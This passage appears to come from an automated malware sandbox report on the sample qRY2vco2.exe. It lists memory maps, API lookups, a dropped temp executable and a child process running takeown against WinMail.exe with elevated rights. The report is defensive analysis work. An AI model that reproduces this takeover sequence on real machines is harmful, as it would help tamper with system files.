| imm32.dll | 0x00210000 | 0x00239fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x01e8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x0203ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:57 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #203: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #203 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\WinMail.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:28, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x95c |
| Parent PID | 0x770 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E00
0x
D88
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000180000 | 0x00180000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x0018ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00193fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x001a0000 | 0x001a4fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00253fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00260fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00271fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00390fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x003c0000 | 0x0047dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00500000 | 0x00529fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00960fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00970000 | 0x00ca6fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
